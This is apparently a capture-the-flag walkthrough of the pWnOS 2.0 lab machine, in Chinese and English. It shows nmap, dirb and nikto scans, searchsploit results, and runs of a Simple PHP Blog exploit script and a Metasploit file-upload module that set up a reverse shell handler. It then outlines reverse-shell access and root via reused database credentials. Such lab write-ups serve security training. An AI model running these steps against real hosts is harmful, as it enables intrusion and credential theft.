pWnOS 2.0

Lad ip:

IP: 10.10.10.100

Information:

Nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# Nmap 7.70 scan initiated Sat Jul 11 07:17:14 2020 as: nmap -v -A -oN info 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.00023s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!

Dirb:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:6004)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5753)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:5037)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5395)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)

Nikto:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
- Nikto v2.1.6/2.1.5
+ Target Host: 10.10.10.100
+ Target Port: 80
+ GET Cookie PHPSESSID created without the httponly flag
+ GET Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ HEAD Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ GET Uncommon header 'tcn' found, with contents: list
+ GET Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ VNEMWNJD Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: GET /includes/: Directory indexing found.
+ OSVDB-3092: GET /includes/: This might be interesting...
+ GET /info/: Output from the phpinfo() function was found.
+ OSVDB-3092: GET /info/: This might be interesting...
+ OSVDB-3092: GET /login/: This might be interesting...
+ OSVDB-3092: GET /register/: This might be interesting...
+ GET /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: GET /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ GET Server may leak inodes via ETags, header found with file /icons/README, inode: 1311031, size: 5108, mtime: Tue Aug 28 18:48:10 2007
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ OSVDB-5292: GET /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ GET /login.php: Admin login page/section found.
  • 访问80端口
    1
  • 发现博客目录 /blog
  • 查看源代码发现博客的版本:simple php blog 0.4.0

Find exp

1
2
3
4
5
6
7
root@kali:~/桌面/LAB/pwnOS v2.0# searchsploit simple php blog 0.4.0
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Simple PHP Blog 0.4.0 - Multiple Remote s | exploits/php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit) | exploits/php/webapps/16883.rb

另外一种关键词

1
2
3
4
5
6
7
8
9
root@kali:~/桌面/LAB/pwnOS v2.0# searchsploit sphpblog
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
SPHPBlog 0.4 - 'search.php' Cross-Site Scripting | exploits/php/webapps/25423.txt
Simple PHP Blog (SPHPBlog) 0.5.1 - Code Execution | exploits/php/webapps/6311.php
Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities | exploits/php/webapps/4557.txt
Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/29051.txt

先看1191.pl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
		  SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________

Program : ./1191.pl
Version : v0.1
Date : 8/25/2005
Descript: This perl script demonstrates a few flaws in
SimplePHPBlog.

Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
NOT HAVE PERMISSION TO DO SO!

Please see this script comments for solution/fixes
to demonstrated vulnerabilities.
http://www.simplephpblog.com

Usage : ./1191.pl [-h host] [-e exploit]

-? : this menu
-h : host
-e : exploit
(1) : Upload cmd.php in [site]/images/
(2) : Retreive Password file (hash)
(3) : Set New User Name and Password
[NOTE - uppercase switches for exploits]
-U : user name
-P : password
(4) : Delete a System File
-F : Path and System File

Examples: ./1191.pl -h 127.0.0.1 -e 2
./1191.pl -h 127.0.0.1 -e 3 -U l33t -P l33t
./1191.pl -h 127.0.0.1 -e 4 -F ./index.php
./1191.pl -h 127.0.0.1 -e 4 -F ../../../etc/passwd
./1191.pl -h 127.0.0.1 -e 1

然后这里用方法1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
		  SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running cmd.php Upload Exploit....


Retrieved Username and Password Hash:
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: a
Password is set to: a
Logged into SimplePHPBlog at: http://10.10.10.100/blog/login_cgi.php
Current Username 'a' and Password 'a'...
Created cmd.php on your local machine.
Created reset.php on your local machine.
Created cmd.php on target host: http://10.10.10.100/blog
Created reset.php on target host: http://10.10.10.100/blog
Removed cmd.php from your local machine.
Failed to POST 'http://10.10.10.100/blog/images/reset.php': 500 Internal Server Error at ./1191.pl line 418.
Removed reset.php from your local machine.

似乎存在问题但是访问/images可以看到文件上传成功了
然后msf版本的,这里也是虽然失败了但是得到了blog的账户和密码 x4ZLwb:UD8lc5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
msf5 > search sphpblog

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/sphpblog_file_upload 2005-08-25 excellent Yes Simple PHP Blog Remote Command Execution


msf5 > use exploit/unix/webapp/sphpblog_file_upload
msf5 exploit(unix/webapp/sphpblog_file_upload) > show options

Module options (exploit/unix/webapp/sphpblog_file_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /sphpblog yes Sphpblog directory path
VHOST no HTTP server virtual host

msf5 exploit(unix/webapp/sphpblog_file_upload) > set RHOSTS 10.10.10.100
RHOSTS => 10.10.10.100
msf5 exploit(unix/webapp/sphpblog_file_upload) > set URI /blog
URI => /blog
msf5 exploit(unix/webapp/sphpblog_file_upload) > run

[*] Started reverse TCP handler on 10.10.10.128:4444
[+] Successfully retrieved hash:
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as x4ZLwb:UD8lc5
[-] Error retrieving cookie!
[+] Successfully Uploaded e5pI9mmspCLu7lnToSIK.php
[+] Successfully Uploaded Vegoar2yysqdPTD7kun0.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/e5pI9mmspCLu7lnToSIK.php
[*] Calling payload: /images/Vegoar2yysqdPTD7kun0.php
[+] Successfully removed /images/Vegoar2yysqdPTD7kun0.php
[*] Exploit completed, but no session was created.

Get Limited Shell

  • 方法1
  • 由第一个exp得到的cmd.php进行反弹shell
  • 方法2
  • 由msf得到的账户密码登录博客,图片上传处上传反弹shell

ROOT

  • 方法1
  • /var目录下的mysqli_connect.php 数据库密码登录SSH为root
  • 方法2